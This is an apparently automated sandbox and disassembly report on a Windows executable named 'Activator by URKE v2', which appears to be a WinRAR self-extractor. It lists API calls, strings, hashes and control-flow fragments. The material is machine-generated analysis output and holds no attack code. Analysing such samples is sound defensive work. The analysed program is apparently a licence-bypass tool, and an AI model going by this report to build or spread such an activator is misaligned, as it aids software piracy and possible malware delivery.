• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
• API String ID: 751436351-2013832382
• Opcode ID: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
• Instruction ID: 73f321bdf33df86738ea5fa9f2293aacc35d219232412407edcd2d4c36e414ef
• Opcode Fuzzy Hash: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
• Instruction Fuzzy Hash: 53627075A09B8A95EB11AF60E9602E9B364FF44B54FC00237DA8C877A5EF3CE154C361
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
• String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
• API String ID: 2514108016-2702805183
• Opcode ID: 90f0c2a0039a61cf03d93d6d4365e523954047bb944b651ca9b0316068dc13b4
• Instruction ID: 8caab0c6b31d2086aba02fe3349895c3d28adf1eff394027aa17a974154b8d93
• Opcode Fuzzy Hash: 90f0c2a0039a61cf03d93d6d4365e523954047bb944b651ca9b0316068dc13b4
• Instruction Fuzzy Hash: E9D2A661A1878A81EA20FB25D8743FAA351EF85F84FC44133D98DC76A6DE3CE554C722
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$MessageMoveSend$DialogItemOperationPathTemp
• String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
• API String ID: 2933078328-3916287355
• Opcode ID: 98bb8c26fd065e7a09049068dcd443c1bd57cd059804933086baa0f4b4fd0c8d
• Instruction ID: 46d1c20f58d33ab629dacf8f908371f76e9d601b2c77942c137be8eecd81cce1
• Opcode Fuzzy Hash: 98bb8c26fd065e7a09049068dcd443c1bd57cd059804933086baa0f4b4fd0c8d
• Instruction Fuzzy Hash: 9F13C262B0478A85EB10EF64D9603EC67B1EB40B98FC00137DA5D97ADADF38E594C361

Control-flow Graph (legend: Executed / Not Executed; first block 7ff7e5f1400c-7ff7e5f140e1)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 3767324925-3710569615
• Opcode ID: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
• Instruction ID: 3de28111497e955d369f7887310670cf07974fe67b33a0a4f0cdc6e0467b932d
• Opcode Fuzzy Hash: 672bf953df9b2c0ed6fd5d6135e2b8bbf1eb438a14cfe977ab9df65a1aaea397
• Instruction Fuzzy Hash: 1E428461A1878A81EF10EB24D9643F9A365FF84F84FC04237DA9D8BA96DF3CD5508721

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
• String ID: $%s:$CAPTION
• API String ID: 2100155373-404845831
• Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
• Instruction ID: 8ac5762fdd535b5dc5c78e2b42e7fed428c14077827cafa57c13c5d7bdae5020
• Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
• Instruction Fuzzy Hash: E9912B72B1864547E714EF29A8107AAA7A1F7C4B84FC44136EE8D9BB58CF3CE805CB10

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 3656887471-364855578
• Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
• Instruction ID: 496a63e348c9d712ef1bc999ccf0a21d9ea769ad9f93315b8e6de0907df1e108
• Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
• Instruction Fuzzy Hash: A0416265A1970A82EB14AB56E4643B9E3A0AF48F95F884436CE0DC7364EF7CE444C722

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
• String ID:
• API String ID: 474548282-0
• Opcode ID: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
• Instruction ID: 343c78cd9cc14e4e857a7baa67d1cccfd3891254bbd1fc2e35c18409c16b6291
• Opcode Fuzzy Hash: 9e2131fdd348412ea29fb79e3f45126eacfe5ffc882fb6d768e47b091ae13561
• Instruction Fuzzy Hash: E461D962A0864A82DE10EB24E56037DA321FB84BA4FC04332EAFD876D9DF3CD554C721
Strings
Memory Dump Source
• Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
Similarity
• API ID:
• String ID: c
• API String ID: 0-112844655
• Opcode ID: eb4e912f9f88d7afe9849d570552e79721c9e35ced0c51bb9257986c74690234
• Instruction ID: 69192ae13809291de78ba364a0fa64e3d1e00a113f87b747b26568baf368917d
• Opcode Fuzzy Hash: eb4e912f9f88d7afe9849d570552e79721c9e35ced0c51bb9257986c74690234
• Instruction Fuzzy Hash: 98E1C432A186598BEB14DF28D4903FDB7A1F788B49F58413ADA5993B88DF7CE440CB11
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
• Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd

                                                                                                                                                                                                                                                  Control-flow Graph

[Control-flow graph, entry block at 7ff7e5f15390; API calls appearing in the graph: RaiseException, LoadLibraryExA, GetLastError, GetProcAddress, FreeLibrary]
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DloadSection$AccessWrite$ExceptionProtectRaiseRelease$AcquireErrorLastLibraryLoad
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 282135826-2852464175
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF9254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E5EF9389
                                                                                                                                                                                                                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5EFA375
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5EFA82F
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5EFA835
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E5EF9CBA), ref: 00007FF7E5F00369
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                                                                                                                                                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                                                                                                                                  • API String ID: 3629253777-3268106645

                                                                                                                                                                                                                                                  Control-flow Graph

[Control-flow graph, entry block at 7ff7e5f13030; API calls appearing in the graph: ShellExecuteExW, WaitForInputIdle, IsWindowVisible, ShowWindow, CloseHandle, GetExitCodeProcess]
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                                                                  • API String ID: 148627002-3607691742

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3569833718-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 2237 7ff7e5f0218c-7ff7e5f0219f call 7ff7e5f157cc
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
                                                                                                                                                                                                                                                  • API String ID: 909987262-704999473

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 2291 7ff7e5ef46a0-7ff7e5ef46db 2292 7ff7e5ef46e6 2291->2292 2293 7ff7e5ef46dd-7ff7e5ef46e4 2291->2293 2294 7ff7e5ef46e9-7ff7e5ef4758 2292->2294 2293->2292 2293->2294 2295 7ff7e5ef475d-7ff7e5ef4788 CreateFileW 2294->2295 2296 7ff7e5ef475a 2294->2296 2297 7ff7e5ef478e-7ff7e5ef47be GetLastError call 7ff7e5ef80b0 2295->2297 2298 7ff7e5ef4868-7ff7e5ef486d 2295->2298 2296->2295 2307 7ff7e5ef47c0-7ff7e5ef480a CreateFileW GetLastError 2297->2307 2308 7ff7e5ef480c 2297->2308 2299 7ff7e5ef4873-7ff7e5ef4877 2298->2299 2301 7ff7e5ef4885-7ff7e5ef4889 2299->2301 2302 7ff7e5ef4879-7ff7e5ef487c 2299->2302 2305 7ff7e5ef48af-7ff7e5ef48c3 2301->2305 2306 7ff7e5ef488b-7ff7e5ef488f 2301->2306 2302->2301 2304 7ff7e5ef487e 2302->2304 2304->2301 2310 7ff7e5ef48c5-7ff7e5ef48d0 2305->2310 2311 7ff7e5ef48ec-7ff7e5ef4915 call 7ff7e5f15c30 2305->2311 2306->2305 2309 7ff7e5ef4891-7ff7e5ef48a9 SetFileTime 2306->2309 2312 7ff7e5ef4812-7ff7e5ef481a 2307->2312 2308->2312 2309->2305 2316 7ff7e5ef48d2-7ff7e5ef48da 2310->2316 2317 7ff7e5ef48e8 2310->2317 2313 7ff7e5ef4853-7ff7e5ef4866 2312->2313 2314 7ff7e5ef481c-7ff7e5ef4833 2312->2314 2313->2299 2318 7ff7e5ef4835-7ff7e5ef4848 2314->2318 2319 7ff7e5ef484e call 7ff7e5f15b1c 2314->2319 2321 7ff7e5ef48df-7ff7e5ef48e3 call 7ff7e5ef1c80 2316->2321 2322 7ff7e5ef48dc 2316->2322 2317->2311 2318->2319 2324 7ff7e5ef4916-7ff7e5ef491b call 7ff7e5f1ae94 2318->2324 2319->2313 2321->2317 2322->2321
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3536497005-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2092733347-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadBitmapW.USER32 ref: 00007FF7E5F0EB7A
                                                                                                                                                                                                                                                  • GetObjectW.GDI32 ref: 00007FF7E5F0EBAB
                                                                                                                                                                                                                                                  • DeleteObject.GDI32 ref: 00007FF7E5F0EBE5
                                                                                                                                                                                                                                                  • DeleteObject.GDI32 ref: 00007FF7E5F0EC15
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C279
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C295
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C2AF
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7E5F14517), ref: 00007FF7E5F0C2C1
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalAlloc.KERNEL32 ref: 00007FF7E5F0C2E2
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalLock.KERNEL32 ref: 00007FF7E5F0C2F7
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: CreateStreamOnHGlobal.COMBASE ref: 00007FF7E5F0C324
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7E5F0C3A5
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalUnlock.KERNEL32 ref: 00007FF7E5F0C3C8
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F0C260: GlobalFree.KERNEL32 ref: 00007FF7E5F0C3D1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                                                                  • String ID: ]
                                                                                                                                                                                                                                                  • API String ID: 1797374341-3352871620
                                                                                                                                                                                                                                                  • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                  • Instruction ID: d301df52925db54233d92239ebf026c284fe5f9fe2c761684859ba31c16d50b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C119661B0D64A42EA10BB5196743F9E391AF88FC8F8C0036DE4D87B85DE3CE9048722

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2398171386-0
                                                                                                                                                                                                                                                  • Opcode ID: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                  • Instruction ID: fbb733c6b1b111da9626433ae8e97f971b2d794915c57e2fa4e15a886a0a8504
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851F662B18B4659FB60EB65E5203BCA361BB54B98FC04633DE5D8A7D4DF3890258321

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1266772231-0
                                                                                                                                                                                                                                                  • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                  • Instruction ID: 79be0e7ae524ae8d63780ff9c5fc80dc629c4e4bbf57c946f284a3829e5c2831
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62F0EC66A3855683EF90AB60E875BB6A361FF94F09FC45032E64EC2854DF3CD609CB11

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F0568F
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E5F05695
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5EF6288: FindClose.KERNEL32(?,?,?,00007FF7E5EFFFA5), ref: 00007FF7E5EF62BD
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F01DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E5F01E25
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmp
